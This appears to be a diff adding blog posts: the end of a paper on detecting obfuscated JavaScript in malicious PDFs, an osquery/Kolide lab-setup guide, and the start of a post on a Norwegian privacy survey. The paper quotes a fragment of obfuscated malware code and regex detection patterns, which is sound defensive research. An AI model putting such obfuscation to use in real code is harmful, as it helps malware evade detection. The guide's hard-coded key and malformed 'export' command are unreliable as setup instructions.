original obfuscated data. We will have a further look at the
|
||||||
|
latter option.
|
||||||
|
|
||||||
|
Take for instance this excerpt from the "Introducing Obfuscation"-section:
|
||||||
|
|
||||||
|
z=c['s'+"ubstr"](0,1);s[a](z);z=c['s'+"ubstr"](1,1);s[a](z);z=c['s'+"ubstr"](2,1);s[a](z);z=c['s'+"ubstr"](3,1);s[a](z);z=c['s'+"ubstr"](4,1);s[a](z);z=c['s'+"ubstr"](5,1);s[a](z);z=c['s'+"ubstr"](6,1);s[a](z);z=c['s'+"ubstr"](7,1);s[a](z);z=c['s'+"ubstr"](8,1);s[a](z);z=c['s'+"ubstr"](9,1);s[a](z);z=c['s'+"ubstr"](10,1);s[a](z);z=c['s'+"ubstr"](11,1);s[a](z);z=c['s'+"ubstr"](12,1);s[a](z);z=c['s'+"ubstr"](13,1);s[a](z);z=c['s'+"ubstr"](12,1);s[a](z);z=c['s'+"ubstr"](12,1);s[a](z);z=c['s'+"ubstr"](14,1);s[a](z);z=c['s'+"ubstr"](12,1);[...](20,1);s[a](z);z=c['s'+"ubstr"](17,1);s[a](z);z=c['s'+"ubstr"](12,1);s[a](z);z=c['s'+"ubstr"](9,1);s[a](z);z=c['s'+"ubstr"](1,1);s[a](z);z=c['s'+"ubstr"](18,1);s[a](z);z=c['s'+"ubstr"](12,1);s[a](z);z=c['s'+"ubstr"](11,1);s[a](z);z=c['s'+"ubstr"](12,1);s[a](z);z=c['s'+"ubstr"](17,1);s[a](z);z=c['s'+"ubstr"](11,1);s[a](z);z=c['s'+"ubstr"](9,1);s[a](z);z=c['s'+"ubstr"](1,1);s[a](z);z=c['s'+"ubstr"](13,1);s[a](z);z=c['s'+"ubstr"](19,1);s[a](z);z=c['s'+"ubstr"](11,1);s[a](z);z=c['s'+"ubstr"](14,1);s[a](z);z=c['s'+"ubstr"](17,1);s[a](z);z=c['s'+"ubstr"](12,1);s[a](z);z=c['s'+"ubstr"](9,1);s[a](z);z=c['s'+"ubstr"](1,1);s[a](z);z=c['s'+"ubstr"](9,1);s[a](z);z=c['s'+"ubstr"](6,1);s[a](z);z=c['s'+"ubstr"](9,1);s[a](z);z=c['s'+"ubstr"](6,1);s[a](z);z=c['s'+"ubstr"](9,1);s[a](z);z=c['s'+"ubstr"](6,1);s[a](z);
|
||||||
|
|
||||||
|
|
||||||
|
Harawa ét al defined the above obfuscation technique as
|
||||||
|
"string splitting" (as seen in the section "Introducing
|
||||||
|
obfuscation"). The following two obfuscation-extraction
|
||||||
|
regular expressions, is previously stated in the authors
|
||||||
|
Bachelors thesis2:
|
||||||
|
|
||||||
|
e.{0,2}v.{0,2}a.{0,2}l.{0,1}
|
||||||
|
|
||||||
|
u.{0,2}n.{0,2}e.{0,2}s.{0,2}c.{0,2}a.{0,2}p.{0,1}e
|
||||||
|
|
||||||
|
Keep the two above statements and the previous code excerpt
|
||||||
|
in mind. When breaking down the above expressions we
|
||||||
|
introduce one more regular expression:
|
||||||
|
|
||||||
|
s.{0,4}u.{0,4}b.{0,4}s.{0,4}t.{0,4}r.{0,4}
|
||||||
|
|
||||||
|
While searching for "substr" in plain text in the plain-text
|
||||||
|
will certainly fail, the above expression will match e.g.:
|
||||||
|
|
||||||
|
's'+"ubstr"
|
||||||
|
|
||||||
|
Recall Kittilsens javascript feature vector: ``[function,
|
||||||
|
eval_length, max_string, stringcount, replace, substring,
|
||||||
|
eval, fromCharCode]``. If extended by the above techniques,
|
||||||
|
the results is somewhat different.
|
||||||
|
|
||||||
|
Without string splitting detection:
|
||||||
|
|
||||||
|
['function: 9', 'eval_length: x', 'max_string: 10849', 'stringcount: 1', 'replace: 1', 'substring|substr: 4', 'eval: 0', 'fromCharCode: 0']
|
||||||
|
|
||||||
|
With outer loop obfuscation variable computation:
|
||||||
|
|
||||||
|
['function: 0', 'eval_length: x', 'max_string: 67', 'stringcount: 2', 'replace: 0', 'substring: 0', 'substr: 3663', 'eval: 1', 'fromCharCode: 0']
|
||||||
|
|
||||||
|
Additionally, rewriting and extending Kittilsens feature
|
||||||
|
vector by several other typically suspicious functions
|
||||||
|
should give preferrable results: ``[max_string, stringcount,
|
||||||
|
function, replace, substring, substr, eval, fromCharCode,
|
||||||
|
indexof, push, unescape, split, join, sort, length,
|
||||||
|
concat]``
|
||||||
|
|
||||||
|
This makes the following results in two random, but related, samples:
|
||||||
|
|
||||||
|
[SHA256:5a61a0d5b0edecfb58952572addc06f2de60fcb99a21988394926ced4bbc8d1b]:{'function': 0, 'sort': 0, 'unescape': 0, 'indexof': 0, 'max_string': 10849, 'stringcount': 2, 'replace': 0, 'substring': 0, 'substr': 1, 'length': 1, 'split': 2, 'eval': 0, 'push': 0, 'join': 1, 'concat': 0, 'fromCharCode': 0}
|
||||||
|
|
||||||
|
[SHA256:d3874cf113fa6b43e7f6e2c438bd500edea5cae7901e2bf921b9d0d2bf081201]:{'function': 0, 'sort': 0, 'unescape': 0, 'indexof': 0, 'max_string': 67, 'stringcount': 1, 'replace': 0, 'substring': 0, 'substr': 3663, 'length': 0, 'split': 0, 'eval': 0, 'push': 1, 'join': 1, 'concat': 0, 'fromCharCode': 0}
|
||||||
|
|
||||||
|
It may perhaps not need a comment, but in the above results
|
||||||
|
we see that there are two types of elements in the feature
|
||||||
|
vector that stands out: max_string and two of the suspicious
|
||||||
|
functions.
|
||||||
|
|
||||||
|
Summarized the "Outer Loop Obfuscation Variable Computation"
|
||||||
|
may be used to, at least partially, defeat the malware
|
||||||
|
authors obfuscation attempts. By running the somewhat
|
||||||
|
complex regular expressions with known malicious obfuscation
|
||||||
|
routines, the implementation result of the 100.000 PDF
|
||||||
|
dataset may be seen in the following table: Dataset
|
||||||
|
generalization by "outer loop obfuscation variable
|
||||||
|
computation" Dataset aggregated by counting javascript
|
||||||
|
variables and functions, OLOVC applied (due to errors in the
|
||||||
|
jsunpack-n the total number of entities calculated is
|
||||||
|
42736).
|
||||||
|
|
||||||
|
Word Count
|
||||||
|
function 651
|
||||||
|
sort 7579
|
||||||
|
unescape 4
|
||||||
|
toLowerCase 1
|
||||||
|
indexof 8
|
||||||
|
max_string 42346
|
||||||
|
stringcount 41979
|
||||||
|
replace 70
|
||||||
|
substring 91
|
||||||
|
replace 70
|
||||||
|
substring 91
|
||||||
|
substr 38952
|
||||||
|
length 1512
|
||||||
|
split 9621
|
||||||
|
eval 77
|
||||||
|
push 260
|
||||||
|
join 91
|
||||||
|
inverse_vector 41423
|
||||||
|
concat 86
|
||||||
|
fromCharCode 45
|
||||||
|
|
||||||
|
By the counts in the above table it is shown that the
|
||||||
|
selected feature vector has several very interesting
|
||||||
|
features. On a sidenote: Even though some features has a
|
||||||
|
larger quantity than others it should be mentioned that this
|
||||||
|
is not necessarily the measure of how good that feature is,
|
||||||
|
such is especially the case with the inverse vector as we
|
||||||
|
will be more familiar with in the next section. Also, as
|
||||||
|
previously mentioned it is interesting to see the
|
||||||
|
composition of multiple features to determine the origin of
|
||||||
|
the script (or the script style if you'd like). The
|
||||||
|
aggregation script is attached in appendice 2.
|
||||||
|
|
||||||
|
The "Outer Loop Obfuscation Variable Computation" will
|
||||||
|
require a notable amount of computational resources in
|
||||||
|
high-quantity networks due to the high workload. In a way
|
||||||
|
this is unavoidable since the threat agents objective of
|
||||||
|
running client-side scripts is to stress the resources of
|
||||||
|
such systems.
|
||||||
|
|
||||||
|
![Fig. 5: Illustration of Computational Complexity. The illustration shows the computational load on a network sensor in regard to different obfuscation techniques](/images/2015/02/Skjermbilde-2012-05-08-kl--20-43-04.png)
|
||||||
|
|
||||||
|
### C.2. Feature Vector Inversion
|
||||||
|
|
||||||
|
Threat agents go a long way in evading detection
|
||||||
|
algorithms. The following thought is derived from a common
|
||||||
|
misconception in database security:
|
||||||
|
|
||||||
|
> A group of ten persons which names are not to be revealed
|
||||||
|
is listed amongst a couple of thousands, in an
|
||||||
|
organizations LDAP directory. The group, let us name it X,
|
||||||
|
is not to be revealed and is therefore not named in the
|
||||||
|
department field.
|
||||||
|
|
||||||
|
While the public may not search and filter directly on the
|
||||||
|
department name, being X, an indirect search would be
|
||||||
|
succesful to reveal the group due to the ten persons being
|
||||||
|
the only ones not associated with a department.
|
||||||
|
|
||||||
|
The concept of searching indirectly may be applied to
|
||||||
|
evaluating javascripts in PDF documents as well. We might
|
||||||
|
start off with some of the expected characters found in
|
||||||
|
benign javascript documents:
|
||||||
|
|
||||||
|
{'viewerVersion':1,'getPrintParams':1,'printd':1,'var':10,'getPageNthWord':1,'annot':2,'numPages':1,'new':3}
|
||||||
|
|
||||||
|
The above which is found by expert knowledge as the probable
|
||||||
|
used variables and functions in a benign javascript or other
|
||||||
|
object. Much of these functions is used in interactive PDF
|
||||||
|
documents, e.g. providing print buttons,
|
||||||
|
|
||||||
|
A weight is added to each cleartext function/variable. After
|
||||||
|
counting the words in the document a summarized variable
|
||||||
|
named the inverted_feature_vector gives an integer. The
|
||||||
|
higher the integer, the higher the probability of the
|
||||||
|
javascript being benign.
|
||||||
|
|
||||||
|
The inversed feature vector may be used as a signature and a
|
||||||
|
whitelist indication database may be built of datasets. In
|
||||||
|
the 100k malicious dataset the statistics showed that out of
|
||||||
|
42475, 41423 had more than one occurence of a known benign
|
||||||
|
variable. This might seem like a less good feature, but the
|
||||||
|
quantity is not the issue here, it is the weight of each
|
||||||
|
variable. So: One may say that the higher the inverse vector
|
||||||
|
is, the more likely it is that the PDF or javascript is
|
||||||
|
benign. To clarify, next table shows variables fragmented by
|
||||||
|
weight: Inverse vector separated by interval, the
|
||||||
|
|
||||||
|
**Shadowserver 100k dataset** _The table shows that most
|
||||||
|
malicious PDF files in the 100k Shadowserver dataset
|
||||||
|
contains low-weighted scores when it comes to the inverted
|
||||||
|
vector as a measure of how benign the scripts are._
|
||||||
|
|
||||||
|
Weight interval Instances Instance percentage
|
||||||
|
<10 15232 35,6%
|
||||||
|
20<>9 26852 62,8%
|
||||||
|
30<>19 136 ~0%
|
||||||
|
40<>29 148 ~0%
|
||||||
|
50<>39 87 ~0%
|
||||||
|
60<>49 28 ~0%
|
||||||
|
>60 253 ~0%
|
||||||
|
Total 42736 -
|
||||||
|
|
||||||
|
The inversion vector may as well be seen as a measure of the
|
||||||
|
likeliness that the script is obfuscated. A quick look at
|
||||||
|
the table shows that the characteristics of obfuscation is
|
||||||
|
found in most PDF documents in the Shadowserver 100k
|
||||||
|
dataset.
|
||||||
|
|
||||||
|
Even though this part of the vector should be seen as an
|
||||||
|
indication, analysts should be aware that threat agents may
|
||||||
|
adapt to the detection technique and insert clear text
|
||||||
|
variables such as the ones listed above in addition to their
|
||||||
|
malicious javascripts. This latter would function as a
|
||||||
|
primitive feature vector inversion jammer. In other words it
|
||||||
|
should be seen in context with the other items of the
|
||||||
|
javascript feature vector as well. Further, the concept
|
||||||
|
should be further evolved to avoid such evasion. One
|
||||||
|
technique to segment the code before analyzing it (giving
|
||||||
|
each code segment a score, finally generating a overall
|
||||||
|
probability score), making it more difficult for the threat
|
||||||
|
agent to utilize noise in his obfuscation.
|
||||||
|
|
||||||
|
### D. Clustering
|
||||||
|
|
||||||
|
Experience shows that in practically oriented environments
|
||||||
|
security analysis is, at least partially, done in a manual
|
||||||
|
manner. This saying that the detection is based on
|
||||||
|
indicators or anomalies and the analysis of the detection
|
||||||
|
results is performed manually by an analyst. Though this may
|
||||||
|
possibly be the approach resulting in least false positives
|
||||||
|
it is overwhelming in regard to analysis of all potentially
|
||||||
|
PDF documents in a larger organization. The 100k PDF dataset
|
||||||
|
used in this paper is a evidence of such. So, how is it
|
||||||
|
possible to automatically detect the interesting parts of
|
||||||
|
the 100k PDF dataset? This question leads to the concept of
|
||||||
|
data mining.
|
||||||
|
|
||||||
|
The definition of data mining is the transformation of data
|
||||||
|
to "meaningful patterns and rules".
|
||||||
|
|
||||||
|
Michael Abernethy at IBM developerWorks20 covers data mining quite extensively.
|
||||||
|
|
||||||
|
#### D.1. A Narrow Experiment and Results
|
||||||
|
|
||||||
|
In this paper the goal is to achieve an view of the dataset
|
||||||
|
in a way that is named "undirected" data mining: Trying to
|
||||||
|
find patterns or rules in existing data. This is achieved
|
||||||
|
through the feature vector previously presented.
|
||||||
|
|
||||||
|
Up until now this paper has discussed how to generate an
|
||||||
|
satisfactionary feature vector and what makes the measure of
|
||||||
|
similarity. Let us do an experiment using WEKA (Waikato
|
||||||
|
Environment for Knowledge Analysis) for analyzing our
|
||||||
|
feature vector.
|
||||||
|
|
||||||
|
Appendice 3 describes the ARFF format found from our feature
|
||||||
|
vector and two of the previously presented feature vectors
|
||||||
|
(SHA256:
|
||||||
|
``5a61a0d5b0edecfb58952572addc06f2de60fcb99a21988394926ced4bbc8d1b``,
|
||||||
|
``d3874cf113fa6b43e7f6e2c438bd500edea5cae7901e2bf921b9d0d2bf081201``)
|
||||||
|
and a random selection of 2587 parseable PDF-documents from
|
||||||
|
the dataset.
|
||||||
|
|
||||||
|
In this experiement the feature vector were produced of 200
|
||||||
|
random samples from the 100k dataset. Interesting in that
|
||||||
|
regard is that the subdataset loaded from originally
|
||||||
|
contained 6214 samples, while our application only handled
|
||||||
|
the decoding of under half. The feature vector was extracted
|
||||||
|
in a CSV format, converted by the following WEKA Java class
|
||||||
|
and loaded in WEKA:
|
||||||
|
|
||||||
|
java -classpath /Applications/weka-3-6-6.app/Contents/Resources/Java/weka.jar weka.core.converters.CSVLoader dataset.csv
|
||||||
|
|
||||||
|
In the WEKA preprocessing, the results may be visualized:
|
||||||
|
|
||||||
|
![Fig. 6: Results 1; PDF Feature Vector DistributionA model
|
||||||
|
showing the PDF feature vector object distribution using
|
||||||
|
the 2587 parsable PDF
|
||||||
|
documents](/images/2015/02/Skjermbilde-2012-05-16-kl--13-17-20.png)
|
||||||
|
|
||||||
|
### D.2. The complete dataset
|
||||||
|
|
||||||
|
Next loading the complete feature vector dataset consisting
|
||||||
|
of 42736 entities showed interesting results when
|
||||||
|
clustering.
|
||||||
|
|
||||||
|
![Fig. 7: Stringcount vs anomalies in the inverse
|
||||||
|
vector. Stringcount vs anomalies in the
|
||||||
|
inverse_vector. Using k-means algorithm and k=5. Medium
|
||||||
|
Jitter to emphasize the
|
||||||
|
clusters](/images/2015/02/Skjermbilde-2012-06-27-kl--11-40-19.png)
|
||||||
|
|
||||||
|
The cluster process above also enables the possibility to
|
||||||
|
look at the anomalies where the inverse_vector is high. For
|
||||||
|
instance 9724 (the highest one in the Y-axis) the
|
||||||
|
inverse_vector is 21510 which is a very clear anomaly
|
||||||
|
compared to the rest of the clusters (the distance is
|
||||||
|
far). This should encourage a closer look at the file based
|
||||||
|
on the hash.
|
||||||
|
|
||||||
|
The Shadowserver 100k ARFF dataset will be further evolved and may be found at the project GitHub page25.
|
||||||
|
|
||||||
|
### E. Logging and Interpreting Errors
|
||||||
|
|
||||||
|
Again and again while analyzing the 100k dataset the
|
||||||
|
interpreter went on parsing errors. Bad code one may say,
|
||||||
|
but a fact is that the threat agents are adapting their code
|
||||||
|
to evading known tools and frameworks. An example of this is
|
||||||
|
a recent bug21 in Stevens PDF parser where empty PDF objects
|
||||||
|
in fact created an exception in the application.
|
||||||
|
|
||||||
|
So, what does this have to do with this paper? Creative
|
||||||
|
threat agents can never be avoided, creating malicious code
|
||||||
|
that avoids the detection routines. This makes an important
|
||||||
|
point, being that the application implemented should be
|
||||||
|
using strict deobfuscation and interpretation routines. When
|
||||||
|
an error occurs, which will happen sooner or later, the file
|
||||||
|
should be traceable and manually analyzed. This in turn
|
||||||
|
should lead to an adaption of the application. Where the
|
||||||
|
routines fails will also be a characteristic of the threat
|
||||||
|
agent: What part of the detection routines does he try to
|
||||||
|
evade? E.g. in the 100k dataset an error on the
|
||||||
|
ascii85-filter occurred. The parsing error made the
|
||||||
|
parser-module not to output a feature vector, and were
|
||||||
|
detected by error monitoring in log files.
|
||||||
|
|
||||||
|
## Discussion and Conclusions
|
||||||
|
|
||||||
|
In regard to being used standalone as evidence the feature
|
||||||
|
vector will have its limitations, especially since its hard
|
||||||
|
to connect it to an event it should be considered
|
||||||
|
circumstancial.
|
||||||
|
|
||||||
|
The PDF and ECMA standard are complex and difficult to
|
||||||
|
interpret, especially when it comes to automation. As has
|
||||||
|
been shown in this article a really hard problem is
|
||||||
|
dynamically and generically executing javascripts for
|
||||||
|
deobfuscation. This is also shown just in the Adobe Reader,
|
||||||
|
where e.g. Adobe Reader X uses Spidermonkey 1.8, while
|
||||||
|
previous more prevalent versions use version 1.7 of
|
||||||
|
Spidermonkey. This often resulted in parsing errors, and
|
||||||
|
again it will potentially cause a larger error rate in the
|
||||||
|
next generation intrusion detection systems.
|
||||||
|
|
||||||
|
It has been proved that a static analysis through a
|
||||||
|
Jsunpack-n modification recovers good enough round-zero
|
||||||
|
data, from a little less than half of the Shadowserver 100k
|
||||||
|
dataset, to generate a characteristic of each file. The
|
||||||
|
results were somewhat disappointing in regard to the
|
||||||
|
extensive parsing errors. Parsing optimalization and error
|
||||||
|
correction making the script more robust and reliable should
|
||||||
|
be covered in a separate report. Despite the latter a good
|
||||||
|
foundation and enough data were given to give a clue for
|
||||||
|
what to expect from the extended PDF feature vector. Also,
|
||||||
|
the inverse vector with its weighting gives a individual
|
||||||
|
score to each document, making it exceptionally promising
|
||||||
|
for further research.
|
||||||
|
|
||||||
|
In regard to OLOVC a certain enhancement would be to combine
|
||||||
|
it with the work of Franke' and Petrovic' "Improving the
|
||||||
|
efficiency of digital forensic search by means of contrained
|
||||||
|
edit distance". Their concept seems quite promising and
|
||||||
|
might provide valuable input to OLOVC.
|
||||||
|
|
||||||
|
The dataset used in this article may contain certain flaws
|
||||||
|
in its scientific foundation. No dataset flaws, but
|
||||||
|
indications that some data origins from the same source, has
|
||||||
|
been seen throughout this article. The reason is most
|
||||||
|
probably that the dataset was collected over three
|
||||||
|
continuous days. Linked to the behaviour of malware it is
|
||||||
|
known that certain malware such as drive-by attacks has
|
||||||
|
peaks in its spread as a function of time. It is therefore
|
||||||
|
natural to assume that there are larger occurences of PDF
|
||||||
|
documents originating from the same threat agent. On the
|
||||||
|
other side, in further research, this should be a measure of
|
||||||
|
the effectiveness of algorithms ability to group the data.
|
||||||
|
|
||||||
|
The Shadowserver 100k dataset only contains distinct
|
||||||
|
files. It would be interesting to recollect a similar
|
||||||
|
dataset with non-distinct hash-entries, and to cluster it by
|
||||||
|
fuzzy hashing as well.
|
||||||
|
|
||||||
|
Even though clustering is mentioned in the last part of this
|
||||||
|
article, further extensive research should be done to
|
||||||
|
completely explore the potential of using the current
|
||||||
|
feature vector. In other words the scope of the article
|
||||||
|
permitted for a manual selection of a feature vector and a
|
||||||
|
more or less defined measure of similarity though the
|
||||||
|
extended PDF feature vector.
|
||||||
|
|
||||||
|
The project has a maintained GitHub page as introduced in
|
||||||
|
the last section. This page should encourage further
|
||||||
|
development into the extended PDF feature vector.
|
||||||
|
|
||||||
|
If you'd like please have a look at the GuC Testimon Forensic Laboratory [21].
|
||||||
|
|
||||||
|
|
||||||
|
[1] GuC Testimon Forensic Laboratory: https://sites.google.com/site/testimonlab/
|
211
data/osquery.md
Normal file
211
data/osquery.md
Normal file
|
@ -0,0 +1,211 @@
|
||||||
|
In another post I wrote about how telemetry is a challenge [1] of
|
||||||
|
a changing and more diverse and modern landscape. Recently I have
|
||||||
|
reviewed some device inventory and endpoint detection tools that
|
||||||
|
will add to the solution. In the future I will get back to my view
|
||||||
|
on Mozilla InvestiGator (MIG) [2], but this post will focus on a
|
||||||
|
telemetry collection tool that I have grown fond of: osquery [3].
|
||||||
|
|
||||||
|
osquery was originally developed by Facebook for the purpose of
|
||||||
|
[4]:
|
||||||
|
|
||||||
|
> Maintaining real-time insight into the current state of your infrastructure[...]
|
||||||
|
|
||||||
|
With osquery data is abstracted, in the operating system in which
|
||||||
|
the agent runs, to a SQL-based interface. It contains a
|
||||||
|
near-infinite amount of available data, which is perfect to a
|
||||||
|
network defender. osquery can even parse native sqlite-databases,
|
||||||
|
which there are lots of in macOS. It also works in a distributed
|
||||||
|
mode like GRR and MiG. In practical terms this means that queries
|
||||||
|
are distributed. On the other hand, events can be streamed as well
|
||||||
|
when considering operational security.
|
||||||
|
|
||||||
|
![Example of the hardware_events table when plugging in and then detaching a Yubikey](/static/img/data/osquery_hardware_events.png)
|
||||||
|
|
||||||
|
Since 2014 osquery has been open sourced and now has a large
|
||||||
|
community developing about every aspect of the tool. According to
|
||||||
|
the briefs that's online several major institutions, including
|
||||||
|
Facebook, now uses osquery in service networks.
|
||||||
|
|
||||||
|
osquery is cross-platform, and now supports: Linux, FreeBSD,
|
||||||
|
Windows and macOS. That is also some of what separates it from its
|
||||||
|
alternatives, like sysmon.
|
||||||
|
|
||||||
|
Posts about osquery that you should review before moving on:
|
||||||
|
|
||||||
|
* Doug Wilson's excellent presentation on FIRST 2018
|
||||||
|
(security-usage focused) [5]
|
||||||
|
* Managing osquery with Kolide (an osquery tls server) [6]
|
||||||
|
* Another post on applying osquery for security [7]
|
||||||
|
* Palantir on osquery [8]
|
||||||
|
|
||||||
|
So that was a couple of links to get you started. The next section shows you how to quickly get a lab environment up and running.
|
||||||
|
|
||||||
|
## Setup and Configuration
|
||||||
|
|
||||||
|
### Prerequisites
|
||||||
|
|
||||||
|
There's only two things that you need setup for the rest of this
|
||||||
|
article if you are on macOS, which can both be easily installed
|
||||||
|
using Homebrew [9]:
|
||||||
|
|
||||||
|
brew install go yarn
|
||||||
|
|
||||||
|
Also you need to configure your Go-path, which can basically be:
|
||||||
|
|
||||||
|
echo "export GOPATH=$HOME/go" >> ~/.bash_profile
|
||||||
|
|
||||||
|
### Server Setup
|
||||||
|
|
||||||
|
Setup Docker image of Kolide Fleet [10]:
|
||||||
|
|
||||||
|
mkdir -p $GOPATH/src/github.com/kolide
|
||||||
|
cd $GOPATH/src/github.com/kolide
|
||||||
|
git clone git@github.com:kolide/fleet.git
|
||||||
|
cd fleet
|
||||||
|
make deps && make generate && make
|
||||||
|
docker-compose up
|
||||||
|
|
||||||
|
Populate the database:
|
||||||
|
|
||||||
|
./build/fleet prepare db
|
||||||
|
|
||||||
|
You are now ready to boot up the web UI and API server:
|
||||||
|
|
||||||
|
./build/fleet serve --auth_jwt_key=3zqHl2cPa0tMmaCa9vPSEq6dcwN7oLbP
|
||||||
|
|
||||||
|
Get enrollment secret and certificate from the Kolide UI at
|
||||||
|
``https://localhost:8080`` after doing the registration process.
|
||||||
|
|
||||||
|
![Kolide enrollment](/static/img/data/kolide-enrollment.png)
|
||||||
|
|
||||||
|
### Client Setup
|
||||||
|
|
||||||
|
Make the API-token (enrollment secret) persistent at the
|
||||||
|
end-point:
|
||||||
|
|
||||||
|
export {enrollment-secret} > /etc/osquery/enrollment.secret
|
||||||
|
|
||||||
|
Define flags file in ``/private/var/osquery/osquery.flags``. This
|
||||||
|
one the client uses to apply the centralised tls logging method,
|
||||||
|
which is the API Kolide has implemented. It is also certificate
|
||||||
|
pinned, so all is good.
|
||||||
|
|
||||||
|
--enroll_secret_path=/etc/osquery/enrollment.secret
|
||||||
|
--tls_server_certs=/etc/osquery/kolide.crt
|
||||||
|
--tls_hostname=localhost:8080
|
||||||
|
--host_identifier=uuid
|
||||||
|
--enroll_tls_endpoint=/api/v1/osquery/enroll
|
||||||
|
--config_plugin=tls
|
||||||
|
--config_tls_endpoint=/api/v1/osquery/config
|
||||||
|
--config_tls_refresh=10
|
||||||
|
--disable_distributed=false
|
||||||
|
--distributed_plugin=tls
|
||||||
|
--distributed_interval=10
|
||||||
|
--distributed_tls_max_attempts=3
|
||||||
|
--distributed_tls_read_endpoint=/api/v1/osquery/distributed/read
|
||||||
|
--distributed_tls_write_endpoint=/api/v1/osquery/distributed/write
|
||||||
|
--logger_plugin=tls
|
||||||
|
--logger_tls_endpoint=/api/v1/osquery/log
|
||||||
|
--logger_tls_period=10
|
||||||
|
|
||||||
|
You can start the osquery daemon on the client by using the
|
||||||
|
following command. At this point you should start thinking about
|
||||||
|
packaging, which is detailed in the osquery docs [11].
|
||||||
|
|
||||||
|
/usr/local/bin/osqueryd --disable_events=false --flagfile=/private/var/osquery/osquery.flags
|
||||||
|
|
||||||
|
osquery also has an interactive mode if you would like to test the
|
||||||
|
local instance, based on a local configuration file:
|
||||||
|
|
||||||
|
sudo osqueryi --disable_events=false --config_path=/etc/osquery/osquery.conf --config_path=/etc/osquery/osquery.conf
|
||||||
|
|
||||||
|
To make the client persistent on macOS, use the following
|
||||||
|
documentation from osquery [12].
|
||||||
|
|
||||||
|
### Managing the Kolide Configuration
|
||||||
|
|
||||||
|
For this part I found what worked best was using the Kolide CLI
|
||||||
|
client [13]:
|
||||||
|
|
||||||
|
./build/fleetctl config set --address https://localhost:8080
|
||||||
|
./build/fleetctl login
|
||||||
|
./build/fleetctl apply -f ./options.yaml
|
||||||
|
|
||||||
|
The ``options.yaml`` I used for testing was the following. This
|
||||||
|
setup also involves setting up the osquery File Integrity
|
||||||
|
Monitoring (FIM) [14], which I wasn't able to get working by the
|
||||||
|
patching curl command [15] in the docs. The config monitors
|
||||||
|
changes in files under ``/etc`` and a test directory at
|
||||||
|
``/var/tmp/filetest``.
|
||||||
|
|
||||||
|
apiVersion: v1
|
||||||
|
kind: options
|
||||||
|
spec:
|
||||||
|
config:
|
||||||
|
decorators:
|
||||||
|
load:
|
||||||
|
- SELECT uuid AS host_uuid FROM system_info;
|
||||||
|
- SELECT hostname AS hostname FROM system_info;
|
||||||
|
file_paths:
|
||||||
|
etc:
|
||||||
|
- /etc/%%
|
||||||
|
test:
|
||||||
|
- /var/tmp/filetest/%%
|
||||||
|
options:
|
||||||
|
disable_distributed: false
|
||||||
|
distributed_interval: 10
|
||||||
|
distributed_plugin: tls
|
||||||
|
distributed_tls_max_attempts: 3
|
||||||
|
distributed_tls_read_endpoint: /api/v1/osquery/distributed/read
|
||||||
|
distributed_tls_write_endpoint: /api/v1/osquery/distributed/write
|
||||||
|
logger_plugin: tls
|
||||||
|
logger_tls_endpoint: /api/v1/osquery/log
|
||||||
|
logger_tls_period: 10
|
||||||
|
pack_delimiter: /
|
||||||
|
overrides: {}
|
||||||
|
|
||||||
|
## Next Steps
|
||||||
|
|
||||||
|
Through this article we've reviewed some of the basic capabilities
|
||||||
|
of osquery and also had a compact view on a lab-setup
|
||||||
|
demonstrating centralised logging, to Kolide, using the tls API of
|
||||||
|
osquery.
|
||||||
|
|
||||||
|
A couple of things that I would have liked to see was support for
|
||||||
|
OpenBSD [16], Android and Ios [17].
|
||||||
|
|
||||||
|
The local setup obviously does not scale beyond your own
|
||||||
|
computer. I briefly toyed with the idea that this would be a
|
||||||
|
perfect fit for ingesting into a Hadoop environment, and not
|
||||||
|
surprising there's a nice starting point over at the Hortonworks
|
||||||
|
forums [18].
|
||||||
|
|
||||||
|
There's a lot of open source information on osquery. I also found
|
||||||
|
the Uptycs blog useful [19].
|
||||||
|
|
||||||
|
[1] https://secdiary.com/2018-02-25-telemetry.html
|
||||||
|
[2] https://mig.mozilla.org
|
||||||
|
[3] https://osquery.io
|
||||||
|
[4] https://code.fb.com/security/introducing-osquery/
|
||||||
|
[5]
|
||||||
|
https://www.first.org/resources/papers/conf2018/Wilson-Doug_FIRST_20180629.pdf
|
||||||
|
[6]
|
||||||
|
https://blog.kolide.com/managing-osquery-with-kolide-launcher-and-fleet-b33b4536acb4
|
||||||
|
[7] https://medium.com/@clong/osquery-for-security-part-2-2e03de4d3721
|
||||||
|
[8] https://github.com/palantir/osquery-configuration
|
||||||
|
[9] https://brew.sh
|
||||||
|
[10]
|
||||||
|
https://blog.kolide.com/managing-osquery-with-kolide-launcher-and-fleet-b33b4536acb4
|
||||||
|
[11] https://osquery.readthedocs.io/en/2.1.1/installation/custom-packages/
|
||||||
|
[12] https://osquery.readthedocs.io/en/stable/installation/install-osx/
|
||||||
|
[13]
|
||||||
|
https://github.com/kolide/fleet/blob/master/docs/cli/setup-guide.md
|
||||||
|
[14]
|
||||||
|
https://osquery.readthedocs.io/en/stable/deployment/file-integrity-monitoring/
|
||||||
|
[15]
|
||||||
|
https://github.com/kolide/fleet/tree/master/docs/api#file-integrity-monitoring
|
||||||
|
[16] https://github.com/facebook/osquery/issues/4703
|
||||||
|
[17] https://github.com/facebook/osquery/issues/2815
|
||||||
|
[18]
|
||||||
|
https://community.hortonworks.com/articles/79842/ingesting-osquery-into-apache-phoenix-using-apache.html
|
||||||
|
[19] https://www.uptycs.com/blog
|
69
data/privacy-report-2014.md
Normal file
69
data/privacy-report-2014.md
Normal file
|
@ -0,0 +1,69 @@
|
||||||
|
I read in a Norwegian news publication yesterday that [more
|
||||||
|
than 50% of Norwegians doesn't care about Internet and
|
||||||
|
network surveillance [1]. In the original 60 page report
|
||||||
|
(survey and report ordered by the Norwegian Data Protection
|
||||||
|
Authority), named Privacy 2014 - The Current State and
|
||||||
|
Trends ("Personvern 2014 - Tilstand og Trender"), 46% of the
|
||||||
|
1501 participants state that they've gotten more concerned
|
||||||
|
with privacy over the last 2-3 years.
|
||||||
|
|
||||||
|
The follow up question that the survey presented was "How
|
||||||
|
much do you care about privacy?". In the 1997 version of the
|
||||||
|
survey 77% said they were "pretty engaged or very engaged"
|
||||||
|
in privacy, while in 2013 there's an increase to 87%. Not as
|
||||||
|
bad as the news publication wants it to be in other words. I
|
||||||
|
guess what is referred to is mentioned in the section "The
|
||||||
|
Chilling Effects in Norway", where more than half of the
|
||||||
|
respondents states they haven't changed online behaviour
|
||||||
|
after the revelations of the American surveillance
|
||||||
|
methodologies. I think this correlates to the next section
|
||||||
|
(below). Also, more than 45% state that they would have
|
||||||
|
continued as normal if Norway were to start a massive
|
||||||
|
surveillance campaign in collaboration with foreign
|
||||||
|
intelligence.
|
||||||
|
|
||||||
|
I read one section where asked "how much control of your own
|
